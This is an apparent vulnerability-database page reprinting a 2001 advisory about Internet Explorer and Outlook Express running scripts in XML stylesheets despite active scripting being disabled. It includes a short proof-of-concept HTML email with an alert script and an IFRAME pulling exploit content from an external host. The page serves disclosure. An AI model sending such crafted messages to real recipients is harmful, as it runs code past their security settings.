Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2001-1325

Publish Date: 20 Apr 2001

                source: http://www.securityfocus.com/bid/2633/info

A vulnerability exists in the handling of XML stylesheets in Internet Explorer and Outlook Express. If active scripting is disabled in all security zones, IE and OE will still allow script to run if it is contained in the stylesheet of an XML page. 

From: "georgi" 
Subject: xstyle
Date: 
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000"
X-Priority: 3
X-MSMail-Priority: Normal

This is a multi-part message in MIME format.

------=_NextPart_000
Content-Type: text/html;
	charset="iso-8859-1"

test
&lt;H1&gt;
XStyle demo. Written by Georgi Guninski
&lt;/H1&gt;

&lt;SCRIPT&gt;
alert("JS should not be working");
&lt;/SCRIPT&gt;

&lt;IFRAME SRC="http://www.guninski.com/xstyle.xml"&gt;&lt;/IFRAME&gt;
------=_NextPart_000--

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Microsoft Internet Explorer 5.0/5.5 / OE 5.5 - XML Stylesheets Active Scripting

Vulmon Search

About

Products

Connect